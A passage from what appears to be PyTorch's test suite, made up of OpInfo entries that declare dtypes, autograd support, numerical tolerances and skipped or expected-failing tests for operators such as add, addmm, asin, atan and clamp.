'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Reference: https://github.com/pytorch/pytorch/issues/50692 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), ), # acosh is not defined at x < 1 (real) or |z| < 1 (complex) reference_numerics_filter=NumericsFilter( condition=lambda x: (torch.abs(x) < 1 if x.is_complex() else x < 1), safe_val=2)), BinaryUfuncInfo('add', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, sample_inputs_func=sample_inputs_add_sub, supports_fwgrad_bwgrad=True, supports_forward_ad=True, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), ), skips=( # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex64, torch.complex128)), )), BinaryUfuncInfo('mul', aliases=('multiply',), dtypes=all_types_and_complex_and(torch.chalf, torch.float16, torch.bfloat16, torch.bool), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True), BinaryUfuncInfo('sub', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.subtract(input, np.multiply(alpha, other)), aliases=('subtract',), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_add_sub, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestCommon', 'test_complex_half_reference_testing', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_comprehensive', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_quick', device_type='cpu'), ), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.uint8,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), OpInfo('addmm', # This addmm OpInfo is for when alpha and beta are not both equal to 1. # alpha=beta=1 is tested in the following opinfo, because that special case will # trigger addmm being decomposed by a jit pass. dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if CUDA11OrLater else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_addmm), OpInfo('addmm', # When alpha=beta=1 as compile-time constants, JIT will decompose addmm into mm and add. variant_test_name='decomposed', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if(CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, autodiff_nonfusible_nodes=['aten::add', 'aten::mm'], sample_inputs_func=partial(sample_inputs_addmm, alpha=1, beta=1), skips=( # https://github.com/pytorch/pytorch/issues/71784 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.float16,)), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), )), OpInfo('addmv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_addmv), OpInfo('addbmm', ref=lambda M, batch1, batch2, beta=1, alpha=1: np.add(np.multiply(np.asarray(beta, dtype=M.dtype), M), np.multiply(np.asarray(alpha, dtype=batch1.dtype), np.sum(np.matmul(batch1, batch2), axis=0))), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1.3e-05, rtol=1.3e-05), torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_numpy_refs')], skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # addbmm does not correctly warn when resizing out= inputs DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # https://github.com/pytorch/pytorch/issues/55907 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addbmm), OpInfo('baddbmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if CUDA11OrLater or TEST_WITH_ROCM else []), backward_dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if SM53OrLater or TEST_WITH_ROCM else [], torch.complex64, torch.complex128), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view', device_type='cuda')], sample_inputs_func=sample_inputs_baddbmm), OpInfo('dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('vdot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_dot_vdot, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('bmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), ), sample_inputs_func=sample_inputs_bmm), OpInfo('mv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mv), OpInfo('addr', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), backward_dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # Reference: https://github.com/pytorch/pytorch/issues/50747 supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/50747 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16)), ), sample_inputs_func=sample_inputs_addr, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('addcmul', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8, torch.int16, torch.int32, torch.int64)), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), OpInfo('addcdiv', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # TODO: update sample inputs with for_inplace_variant kwarg to support this test DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addcmul_addcdiv), UnaryUfuncInfo('asin', aliases=('arcsin', ), ref=np.arcsin, domain=(-1, 1), supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-05, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda'), precisionOverride({torch.bfloat16: 1e-2}), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), # NOTE: derivative for inplace asinh is not implemented UnaryUfuncInfo('asinh', aliases=('arcsinh', ), ref=np.arcsinh, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('atan', aliases=('arctan', ), ref=np.arctan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM, device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), BinaryUfuncInfo('atan2', aliases=('arctan2',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_float=True, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), UnaryUfuncInfo('atanh', aliases=('arctanh', ), ref=np.arctanh, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cfloat], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_WITH_ROCM, device_type='cuda', dtypes=[torch.complex128]), )), OpInfo('allclose', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=np.allclose, supports_autograd=False, supports_forward_ad=False, sample_inputs_func=sample_inputs_allclose, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_out=False), OpInfo('broadcast_to', ref=np.broadcast_to, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_broadcast_to), OpInfo('broadcast_shapes', op=torch.broadcast_shapes, ref=np.broadcast_shapes if np.lib.NumpyVersion(np.__version__) >= '1.20.0' else None, dtypes=_dispatch_dtypes((torch.float32,)), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, supports_autograd=False, supports_scripting=False, sample_inputs_func=sample_inputs_broadcast_shapes, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # skip dtype tests since broadcast_shape is not device dependent. # having dtypes limited to torch.float32 would cause test_dtypes to report unexpected success DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_dtypes'), # skip these tests since we have non tensor input DecorateInfo(unittest.skip('Skipped!'), "TestCommon", "test_noncontiguous_samples"), DecorateInfo(unittest.skip('Skipped!'), 'TestCommon', 'test_variant_consistency_eager'), DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('broadcast_tensors', ref=np.broadcast_arrays, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_broadcast_tensors, reference_inputs_func=reference_inputs_broadcast_tensors, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), )), OpInfo('block_diag', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Default batching rule in core doesn't work for ops with TensorList args check_batched_forward_grad=False, skips=( # https://github.com/pytorch/pytorch/issues/64997 DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_block_diag), UnaryUfuncInfo('bitwise_not', ref=np.bitwise_not, dtypes=integral_types_and(torch.bool), operator_variant=operator.invert, supports_autograd=False), BinaryUfuncInfo('bitwise_left_shift', op=torch.bitwise_left_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.lshift, inplace_operator_variant=operator.ilshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('bitwise_right_shift', op=torch.bitwise_right_shift, dtypes=integral_types(), dtypesIfCUDA=integral_types(), operator_variant=operator.rshift, inplace_operator_variant=operator.irshift, supports_autograd=False, supports_one_python_scalar=True, rhs_make_tensor_kwargs=dict(low=0), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), OpInfo('combinations', op=torch.combinations, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_combinations), OpInfo('cartesian_prod', op=torch.cartesian_prod, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cartesian_prod, skips=( DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), )), OpInfo('cdist', dtypes=floating_types(), supports_out=False, supports_gradgrad=False, assert_autodiffed=False, sample_inputs_func=sample_inputs_cdist), UnaryUfuncInfo('ceil', ref=np.ceil, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('cholesky', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],), OpInfo('cholesky_inverse', dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_gradgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky_inverse, gradcheck_wrapper=gradcheck_wrapper_triangular_input_real_positive_diagonal, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Strides are not the same! Original strides were ((4, 2, 1),) and strides are now ((4, 1, 2),) DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),)), OpInfo('cholesky_solve', op=torch.cholesky_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_cholesky_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('chunk', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_chunk, reference_inputs_func=reference_inputs_chunk, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('clone', ref=np.copy, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_clone, reference_inputs_func=reference_inputs_clone, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('contiguous', op=lambda x, *args, **kwargs: x.contiguous(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_contiguous, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_fusible_nodes=['aten::contiguous'], assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('sum_to_size', op=lambda x, *args, **kwargs: x.sum_to_size(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sum_to_size, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float,)),),), OpInfo('symeig', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_symeig, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off]), # NOTE: clamp has separate opinfos for scalar min/max (unary op) vs. tensors OpInfo('clamp', aliases=('clip',), ref=_clamp_numpy, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_clamp, reference_inputs_func=partial(reference_inputs_elementwise_ternary, sample_inputs_func=sample_inputs_clamp), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # nvFuser and NNC appear to not handle boolean clamp DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), )), UnaryUfuncInfo('positive', ref=np.positive, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('conj', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_sparse=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('conj_physical', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # RuntimeError: inputSet && outputSet # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":118, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, )), DecorateInfo(unittest.skip("Skipped! conj_physical_ not implemented for sparse"), 'TestSparseUnaryUfuncs', 'test_inplace'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 